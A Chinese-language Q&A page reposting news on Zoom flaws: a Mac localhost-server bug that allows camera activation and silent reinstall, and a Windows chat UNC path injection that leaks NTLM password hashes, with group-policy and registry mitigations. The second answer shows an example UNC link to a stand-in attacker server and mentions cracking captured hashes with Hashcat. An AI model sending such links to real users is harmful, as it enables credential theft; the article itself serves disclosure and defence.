視頻會議軟件Zoom的Windows客戶端,近日爆出了怎樣的安全漏洞?

cnBeta


視頻會議軟件Zoom被發現嚴重安全漏洞 即便卸載也可開啟攝像頭進行監視。

攻擊者可利用此漏洞可以遠程開啟目標用戶的攝像頭進行監視,並且即便用戶卸載Zoom for Mac 也無濟於事。

漏洞原因在於ZOOM for Mac系統的客戶端軟件中存在bug缺陷,攻擊者通過在自己網站中部署利用代碼,當安裝有ZOOM for Mac的系統用戶訪問該網站後,就能觸發漏洞,實現未授權的攝像頭開啟。

這種情況下,可讓受害者反覆不停地加入一個無效的視頻會議,致使其安裝有ZOOM客戶端形成拒絕服務攻擊(DoS)。此外,如果用戶在系統中安裝了ZOOM客戶端軟件之後又卸載了它,但是,它仍然在你的系統中殘存有一個localhost的Web服務,通過該殘存服務,ZOOM可以不用任何用戶交互操作即能實現完整的程序重裝,目前,這個所謂的“重裝”功能依然有效。


南哥語淺情濃


近日,Windows 版 Zoom 客戶端爆出了容易受到 NUC 路徑注入攻擊的安全漏洞。

作為一款音視頻會議應用,Zoom 還允許用戶在聊天界面通過發送文本消息來互相交流。

然而外媒 Bleeping Computer 指出,攻擊者可利用聊天模塊的漏洞,竊取點擊了相關鏈接的用戶的 Windows 登陸憑據。

【UNC 注入示例】

發送聊天消息時,所有發送的 URL 都將經過轉換,以便群內其他成員點擊,繼而在默認的瀏覽器中打開網頁。

然而安全研究人員 @ _g0dmode 發現,Zoom 客戶端竟然還將 Windows 網絡 UNC 路徑,也轉換成了聊天消息中可單擊的鏈接。

如圖所示,常規 URL 和 NUC 路徑(\\\\evil.server.com\\images\\cat.jpg),都被轉換成了聊天消息中的可點擊鏈接。

【捕獲的 NTLM 密碼哈希值】

若用戶單擊 UNC 路徑鏈接,則 Windows 將嘗試使用 SMB 文件共享協議連接到遠程站點,以打開遠程路徑中的 cat.jpg 文件。

默認情況下,Windows 將發送用戶的登錄名和 NTLM 密碼哈希值,但稍有經驗的攻擊者均可藉助 Hashcat 之類的免費工具來逆向運算。

【簡單密碼可在 16 秒內被暴力破解】

安全研究人員 Matthew Hickey(@ HackerFantastic)實測發現,其能夠在 Zoom 中順利注入,並且可以藉助當前的民用級 GPU 和 CPU 來快速破解。

除了竊取 Windows 登陸憑據,Hickey 還向 Bleeping Computer 透露,通過點擊鏈接的方式,UNC 注入還適用於啟動本地計算機上的程序(比如 CMD 命令提示符)。

【程序運行提示】

慶幸的是,Windows 會在程序被執行前發出是否允許其運行的提示。想要堵上這一漏洞,Zoom 必須阻止 Windows 客戶端的 UNC 路徑轉換功能(屏蔽部分可點擊的超鏈接)。

據悉,Hickey 已經在 Twitter 上向 Zoom 官方發去了有關該安全漏洞的通知,但目前尚不清楚該公司已採取怎樣的行動。

注重安全的客戶,可在官方補丁發佈前,通過組策略來限制向遠程服務器傳出 NTLM 通信(參考如下操作):

計算機配置 -> Windows 設置 -> 安全設置 -> 本地策略 -> 安全選項 -> 網絡安全:限制NTLM -> 發送到遠程服務器的 NTLM 通信(然後全部配置為拒絕)。

需要注意的是,如果在已經加入相關域的計算機上配置上述組策略時,可能會在嘗試訪問共享時遇到問題。

如果是無權訪問組策略設置 Windows 10 家庭版用戶,亦可使用註冊表編輯器來完成相關限制操作(dword 配置為 2):

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0]"RestrictSendingNTLMTraffic"=dword:00000002

如需正確創建此鍵值,Windows 用戶記得以管理員身份來啟動註冊表編輯器。

若日後有必要恢復默認發送 NTLM 憑據的 Windows 行為,也只需刪除對應的 RestrictSendingNTLMTraffic 鍵值。


分享到:


相關文章: